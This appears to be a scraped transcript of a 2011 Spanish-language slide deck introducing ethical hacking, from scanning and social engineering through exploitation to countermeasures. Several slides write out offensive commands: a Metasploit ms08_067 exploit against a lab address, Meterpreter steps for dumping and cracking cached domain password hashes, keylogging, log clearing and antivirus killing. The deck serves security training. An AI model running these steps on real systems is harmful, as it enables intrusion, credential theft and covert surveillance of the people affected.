Lima, 24 Setiembre, 2011 - el-palomo.com³nv3.pdf · Omar Palomino –omarc320@gmail.com 3 •“10...

Post on 06-Oct-2018

215 views 0 download

Transcript of Lima, 24 Setiembre, 2011 - el-palomo.com³nv3.pdf · Omar Palomino –omarc320@gmail.com 3 •“10...

OMARC320@GMAIL.COM

Lima, 24 Setiembre, 2011

AGENDA

2 Omar Palomino – omarc320@gmail.com

1 • Acerca del autor

2 • Introducción al Ethical Hacking

3 • Ethical Hacking vs Pentesting

4 • Escaneo de red organizacional

5 • Análisis de Vulnerabilidades

6 • Explotación de Vulnerabilidades

7 • Pentesting

8 • Prevención y contramedidas

24/09/2011

3 Omar Palomino – omarc320@gmail.com

• “10 años” de experiencia en seguridad de información

• Psicólogo que aun no comienza sus estudios….

• Maestrista de Ing. de Computación y Sistemas

• Consultor en Seguridad de información, CEH

• Escritor en mis tiempos libres:

http://www.el-palomo.com

24/09/2011

1 • Acerca del autor

• Ethical Hacking = Hacker “bueno”

– Prevención de ataques mal intencionados.

– Análisis de vulnerabilidades preventivos

– Cumplimientos de normas: NTP, ISO 27001

– Uso de metodologías:

• OSSMT, OWASP, etc

– Cumplimiento de la legislación peruana

4 Omar Palomino – omarc320@hotmail.com

2 •Introducción al Ethical Hacking

24/09/2011

5 Omar Palomino – omarc320@gmail.com

3 •Ethical Hacking vs Pentesting

24/09/2011

6 Omar Palomino – omarc320@gmail.com

3 •Ethical Hacking vs Pentesting

24/09/2011

7 Omar Palomino – omarc320@gmail.com

• Uso de herramientas:

– Nmap: La herramienta por excelencia.

– Tracert: Examina las rutas de llegada

– Consulta a los DNS (http://network-tools.com)

– Consúltale a Google

Tools:

* Maltego (veamos un ejemplo)

4 •Escaneo de red organizacional

24/09/2011

8 Omar Palomino – omarc320@gmail.com

• NMAP:

Root# nmap –sV –O –T3 –PN –F <target>

4 •Escaneo de red organizacional

24/09/2011

9 Omar Palomino – omarc320@gmail.com

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

ACK

Nmap reconoce que hay una conexión abierta: Bingo

10 Omar Palomino – omarc320@gmail.com

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

ACK

Nmap NO reconoce que hay una conexión abierta

11 Omar Palomino – omarc320@gmail.com

• NMAP Avanzado: TCP Syn Scan

4 •Escaneo de red organizacional

24/09/2011

SYN

SYN / ACK

RST

Nmap reconoce que hay una conexión abierta: BINGO!

Root# nmap –sS –v <target>

12 Omar Palomino – omarc320@gmail.com

• NMAP Avanzado: Técnicas evasivas de IPS/IDS

4 •Escaneo de red organizacional

24/09/2011

- F: Fragmentar paquetes

- sF: FIN Scan (Stealth Scan)

Omar Palomino – omarc320@gmail.com 13

4 •Escaneo de red organizacional: Ing. Social

Llamadas telefónicas

Piggybacking

Escritorios limpios

Dumpster diving

Phishing

Redes Sociales

MALTEGO

24/09/2011

Omar Palomino – omarc320@gmail.com 14

4 •Escaneo de red organizacional: Ing. Social

24/09/2011

Omar Palomino – omarc320@gmail.com 15

5 • Análisis de Vulnerabilidades

Nessus

Qualys

Acunetix

Shadow Security Scanner

Bactrack

• Vulnerabilidades en S.O y

Aplicaciones

24/09/2011

Omar Palomino – omarc320@gmail.com 16

5 • Análisis de Vulnerabilidades

Nessus

24/09/2011

Omar Palomino – omarc320@gmail.com 17

Metasploit

24/09/2011

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

payload => windows/vncinject/bind_tcp

msf exploit(ms08_067_netapi) > show options

msf exploit(ms08_067_netapi) > set RHOST 192.168.117.129

RHOST => 192.168.117.129

msf exploit(ms08_067_netapi) > exploit

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 18

Metasploit

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 19

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 20

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Meterpreter: Familia de plugins avanzados de los mismos creadores de

Metasploit Framework, que se utiliza sobre sistemas comprometidos

y tienen como característica fundamental que todo es cargado en

memoria sin crear ningún proceso adicional ni dejar “rastros”

PS

SYSINFO

IDLETIME

Omar Palomino – omarc320@gmail.com 21

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

PS SYSINFO

IDLETIME HASHDUMP

Omar Palomino – omarc320@gmail.com 22

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto

SUPERPASSWORD

SUPERPA SSWORD

e52cac67419a9a22 4a3b108f3fa6cb6d

e52cac67419a9a224a3b108f3fa6cb6d

Omar Palomino – omarc320@gmail.com 23

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

http://ophcrack.sourceforge.net/tables.php

http://www.freerainbowtables.com/en/tables/

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/

Omar Palomino – omarc320@gmail.com 24

Rainbow Tables

24/09/2011

6 •Explotación de Vulnerabilidades

Almacenamiento contraseñas del Active Directory

Meterpreter> mkdir C:\cache

Meterpreter> upload /root/cache C:\cache

Meterpreter> cd C:\cache

Meterpreter> ls

C:\cachedump.exe > salida.txt

Meterpreter> download salida.txt

root@bt:/pentest/passwords/john# ./john --wordlist:password.lst -format:mscash salida.txt

Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x])

password (mpalomino)

superpassword (opalomino)

Omar Palomino – omarc320@gmail.com 25

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos:

SNIFFING

Interfaces de red TECLADO

Meterpreter> ps

Meterpreter> migrate 1736

Meterpreter> getpid

Meterpreter> keyscan_start

Meterpreter> keyscan_dump

Meterpreter> keyscan_stop

Omar Palomino – omarc320@gmail.com 26

Armitage

24/09/2011

6 •Explotación de Vulnerabilidades

Screenshot Clearev

Webcam Run get_application_list

Winenum Excute –f cmd.exe –i -t

Run killav Download

Run enum_shares

Run service_maneger -l

Omar Palomino – omarc320@gmail.com 27

Vistumbler

Android: Wifiscan, Wigle Wifi

Antena: Chipset Realtek o Atheros

Airmon

• Vulnerabilidades en

REDES INALAMBRICAS:

• Encontrar redes

vulnerables:

• Cifrado WEP

• Filtrado MAC

• Wardriving

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 28

¡Más de 30 redes

vulnerables!

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 29

¡Más de 20 redes

vulnerables!

24/09/2011

6 •Explotación de Vulnerabilidades

Omar Palomino – omarc320@gmail.com 30 24/09/2011

6 •Explotación de Vulnerabilidades AndroidScreenCast:

./adb kill-server

./adb star-server

Requerimientos para

auditoría wireless:

• Chipset Realtek, Atheros

• Antena con potencia

• Diversas herramientas:

airmon

Omar Palomino – omarc320@gmail.com 31

• Vulnerabilidades en la

RED:

• Encontrar información

importante viajando en

la red.

• Contraseñas

• Conversaciones

• Acceso a segmentos

de red no autorizado.

6 •Explotación de Vulnerabilidades

Ettercap

Wireshark

Cain y Abel

SSLTrip

Metasploit

Airmon

24/09/2011

Omar Palomino – omarc320@gmail.com 32

8 •Prevención y contramedidas

La Seguridad no es solo un proceso Tecnológico… Es

un proceso Organizacional

“El único sistema seguro es aquél que está apagado en el interior de un bloque de

hormigón protegido en una habitación sellada y

rodeada por guardias armados”.

Eric Raymond

24/09/2011

Omar Palomino – omarc320@gmail.com 33

8 •Prevención y contramedidas

FACTOR TÉCNICO

* Firewall capa 3

* Firewall de aplicaciones

* Firewall de Bases de datos

* IPS/IDS

* Correlación de eventos

……….

FACTOR HUMANO

* Campañas de concientización

* Pruebas de ingeniería social

* Charlas y reuniones

…….

SISTEMA DE GESTIÓN

* Sistema de Gestión de seguridad de información (SGSI)

* ISO 27001 /17799

* Gestión de Riesgos (ISO 27005)

* ITIL, COBIT

……

24/09/2011

OMARC320@GMAIL.COM

Lima, 24 Setiembre, 2011